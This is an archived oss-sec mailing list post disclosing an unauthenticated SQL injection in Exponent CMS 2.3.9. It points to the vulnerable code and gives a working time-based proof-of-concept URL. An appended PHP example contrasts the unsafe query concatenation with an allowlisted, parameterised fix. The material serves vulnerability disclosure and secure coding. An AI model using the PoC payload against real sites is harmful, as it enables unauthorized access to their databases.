oss-sec mailing list archives
Exponent CMS 2.3.9 SQL injection vulnerabilities
From: east wu <ylgaaaaa () gmail com>
Date: Mon, 19 Sep 2016 13:46:34 +0800
https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L172

'is_what' parameter there is an injection without login

https://github.com/exponentcms/exponent-cms/blob/master/framework/core/subsystems/expDatabase.php#L559

$this->sql("UPDATE " . $this->prefix . $table . " SET " . $col . "=0 WHERE " . $where);

POC:
/index.php?controller=address&action=activate_address&is_what=address1=(select * from (select sleep(5))x)%23&id=1
Current thread:
- Exponent CMS 2.3.9 SQL injection vulnerabilities east wu (Sep 19)
- <Possible follow-ups>
- Exponent CMS 2.3.9 SQL injection vulnerabilities 王禹哲 (Sep 19)
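The concatenation quoted in the report next to an allowlisted form, as an added example that is not part of the original post and is not Exponent CMS code. The function names, the ALLOWED_FLAGS table, its column names, the `exponent_` prefix and the `user_id` filter are assumptions made for illustration; the `is_what` value is the one from the PoC, URL-decoded, and is assumed to reach `$col`.

```php
<?php
// Added illustration: all names here are hypothetical, not Exponent CMS APIs.

// Constructed allowlist: table => flag columns a request is allowed to reset.
const ALLOWED_FLAGS = [
    'addresses' => ['is_default', 'is_billing', 'is_shipping'],
];

// Pattern from the report: the column name is concatenated into the statement,
// so whatever the request supplies becomes part of the SQL text.
function toggle_sql_unsafe(string $prefix, string $table, string $col, string $where): string
{
    return "UPDATE " . $prefix . $table . " SET " . $col . "=0 WHERE " . $where;
}

// Hardened form: identifiers cannot be bound as parameters, so the column must
// match the allowlist exactly; the row filter is a bound integer, not a string.
function toggle_sql_safe(string $prefix, string $table, string $col, int $userId): array
{
    if (!in_array($col, ALLOWED_FLAGS[$table] ?? [], true)) {
        throw new InvalidArgumentException('column not allowed: ' . $col);
    }
    $sql = sprintf('UPDATE `%s%s` SET `%s` = 0 WHERE `user_id` = ?', $prefix, $table, $col);
    return [$sql, [$userId]]; // statement text and parameters for a prepared statement
}

// is_what value from the PoC on this page, URL-decoded (%23 is '#').
$isWhat = 'address1=(select * from (select sleep(5))x)#';

// Unsafe builder: the subquery lands in the SET clause and '#' comments out the rest.
echo toggle_sql_unsafe('exponent_', 'addresses', $isWhat, 'user_id=1'), "\n";

// Safe builder: the same input is rejected before any SQL text is produced.
try {
    toggle_sql_safe('exponent_', 'addresses', $isWhat, 1);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// A legitimate column name passes and yields a parameterised statement.
[$sql, $params] = toggle_sql_safe('exponent_', 'addresses', 'is_default', 1);
echo $sql, ' with params ', json_encode($params), "\n";
```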